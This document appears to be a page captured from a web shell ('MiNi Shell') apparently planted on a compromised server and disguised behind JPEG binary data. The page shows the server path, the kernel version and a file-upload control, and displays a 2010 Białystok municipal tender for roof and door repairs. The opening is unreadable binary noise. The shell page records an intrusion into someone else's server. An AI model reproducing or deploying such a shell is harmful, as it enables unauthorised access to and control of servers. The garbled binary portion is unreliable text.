JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/324977-N-2010.html

<p class="kh_header"><b>Białystok: Remont obróbek blacharskich przy ul. Bukowskiego 4  w Białymstoku - zadanie nr 1;
Wymiana drzwi wejściowych do lokali mieszkalnych przy ul. Jesiennej 2  w Białymstoku zadanie nr 2;</b><br>
<b>Numer ogłoszenia: 324977 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont obróbek blacharskich przy ul. Bukowskiego 4  w Białymstoku - zadanie nr 1;
Wymiana drzwi wejściowych do lokali mieszkalnych przy ul. Jesiennej 2  w Białymstoku zadanie nr 2;.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1)	dla zadania nr 1 - remont obróbek blacharskich   - przy ul. Bukowskiego 4 w Białymstoku,
2)	dla zadania nr 2 - wymiana drzwi wejściowych do budynku przy ul. Jesiennej  2 w Białymstoku,
zgodnie z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych. Szczegółowy opis przedmiotu zamówienia został podany w załączniku nr 1 do SIWZ Opis przedmiotu zamówienia.
Zad. nr 1 - remont obróbek blacharskich Bukowskiego 4 w Białymstoku. 
Przedmiotem zamówienia jest wykonanie doszczelnia dachu i naprawa obróbek z papy i blachy  ocynkowanej.
Zakres przedmiotu zamówienia:
-	demontaż instalacji odgromowej
-	rozbiórka  części pokrycia dachu z z papy
-	rozbiórka obróbek blacharskich
-	rozebranie rynien i rur spustowych
-      naprawa pokrycia dachu papą termozgrzewalną -pas połaci dachowej  i gzymsu
-	naprawa pokrycia dachu- styk pasa nadrynnowego z połacią dachu
-	naprawa pokrycia z papy termozgrzewalnej - obróbki połączenia pasa nadrynnowego z połacią dachową
-	montaż rynien i rur - z odzysku
-	montaż instalacji odgromowej -z odzysku

Zadanie nr 2 - wymiana drzwi wejściowych do budynku przy ul. Jesiennej  2 w Białymstoku.
wymiana  stolarki drzwiowej drewnianej  na drzwi stalowe ocieplane z naświetlem w kolorze złoty dąb w lokalach mieszkalnych  budynku   przy ul. Jesiennej  2 .
Przedmiotem zamówienia jest wykonanie, dostawa oraz wymiana stolarki drzwiowej drewnianych  na drzwi stalowe ocieplone w kolorze złoty dąb w lokalach mieszkalnych zgodnie z zakresem zamówienia
1.Zakres przedmiotu zamówienia:
-	wykonanie i montaż drzwi stalowych ocieplanych z naświetlem  w miejsce istniejących  drzwi  drewnianych zgodnie z i opisem uwzględniając ocieplenie ościeży
-	uszczelnienie styku drzwi  z ościeżami od wewnątrz
-	uzupełnienie tynków wewnętrznych ościeży drzwi 
-	szpachlowanie wykonanych uzupełnień tynków gładzią gipsową
-	pomalowanie naprawionych powierzchni ościeży farbą emulsyjną

2.  Konstrukcja drzwi
-	konstrukcja stalowa  w kolorze  złoty dąb z naświetlem
-	naświetle szklon  pakietem jednokomorowym o wsp. U=1.1 W/m2K 

3. W skład usługi  wchodzą n/w czynności:
 -    dokonanie pomiaru drzwi z natury 
-	demontaż drzwi  przewidzianych do wymiany
-	montaż drzwi  obejmujący zamocowanie w otworach dyblami i uszczelnienie pianką 
-	naprawa ościeży po demontażu stolarki  drzwiowej i wykuciu otworu, uzupełnienie tynków, szpachlowanie i pomalowanie naprawionych powierzchni
-	uszczelnienie połączenia ościeżnic drzwi z ościeżami wewnętrznymi
-	uzupełnienie ubytków
-	wywóz zdemontowanej stolarki na wysypisko

UWAGA!
Wymiana stolarki drzwiowej  dotyczy lokali mieszkalnych, gdzie termin prowadzenia robót należy ustalić w porozumieniu z najemcą  i wykonawcą remontu elewacji . 

2.	Wymaga się udzielenia gwarancji na:
1)	zadanie nr 1: minimum 3 letniej gwarancji i rękojmi na roboty wraz z materiałami,
2)	zadanie nr 2: minimum 5 letniej gwarancji i rękojmi na roboty wraz z materiałami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.14.20-4, 45.26.19.10-6, 45.42.11.31-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w rozdziale VI SIWZ pkt 3 ppkt 1 i 2, 
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,
3) uproszczony kosztorys ofertowy, tj.: dla każdej pozycji przedmiaru wykonawca wylicza cenę jednostkową netto i wymnaża ją przez ilość robót podaną w przedmiarze. Cena jednostkowa musi zawierać wszystkie koszty do poniesienia przez wykonawcę w celu wykonania opisanej roboty zgodnie z przedmiarem robót. Zestawienie zawierające wykaz procentowych wskaźników cenotwórczych: Koszty Ogólne, Koszty Zakupu, Zysk, stawkę roboczogodziny, zestawienie cen jednostkowych materiału i sprzętu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę wynagrodzenia w następujących przypadkach:
1)	wystąpienia robót zamiennych:
Podstawą określenia wynagrodzenia za roboty zamienne będzie protokół konieczności uzgodniony przez przedstawicieli stron oraz kosztorysy sporządzone przez Wykonawcę metodą kalkulacji szczegółowej, zawierające zakres robót według technologii przyjętej w kosztorysie ofertowym, stanowiącym podstawę obliczenia ceny w ofercie oraz zakres robót podlegających na wykonaniu wg nowej technologii, z uwzględnieniem danych wyjściowych do kosztorysowania (stawka r-g, wskaźnik kosztów pośrednich i zysku, ceny materiałów, ceny sprzętów-według średnich stawek i cen podawanych w wydawnictwach SEKOCENBUD (tabela dla regionu podlaskiego) z kwartału poprzedzającego realizację robót, a w przypadku ich braku wg cen udokumentowanych 
i uzgodnionych z Zamawiającym,
2)	rezygnacji z realizacji części robót:
Podstawą określenia wynagrodzenia za zaniechany zakres robót będzie protokół konieczności uzgodniony przez przedstawicieli stron oraz kosztorys sporządzony przez Wykonawcę metodą kalkulacji szczegółowej, zawierający pozycje dla robót zaniechanych z kosztorysu ofertowego Wykonawcy,
3)	zmiany stawki podatku VAT wynikająca z obowiązującego prawa.
Strony dopuszczają  możliwość przedłużenia terminu wykonania zamówienia  o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach:
1)	wystąpienia robót dodatkowych, awaryjnych, zamiennych itp., których wykonanie wiąże się 
z koniecznością wydłużenia czasu realizacji zamówienia,
2)	wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny,
3)	działania siły wyższej, tzn. zjawisk mających charakter nagły, gwałtowny, nieprzewidywalny 
(np. powódź, huragan, trzęsienie ziemi, działania i zamieszki wojenne, ataki terrorystyczne, ekonomiczne następstwa globalnego kryzysu finansowego),
4)	przerwania lub zawieszenia robót przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę,
5)	w przypadku wystąpienia warunków atmosferycznych nie pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienia odpowiedniej ich jakości(ciągłe opady deszczu, niska temperatura powietrza)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego ul. gen. J. Bema 89/1 15-370 Białystok pokój nr 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 09:00, miejsce: Zarząd Mienia Komunalnego ul. gen. J. Bema 89/1 15-370 Białystok pokój nr 201 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com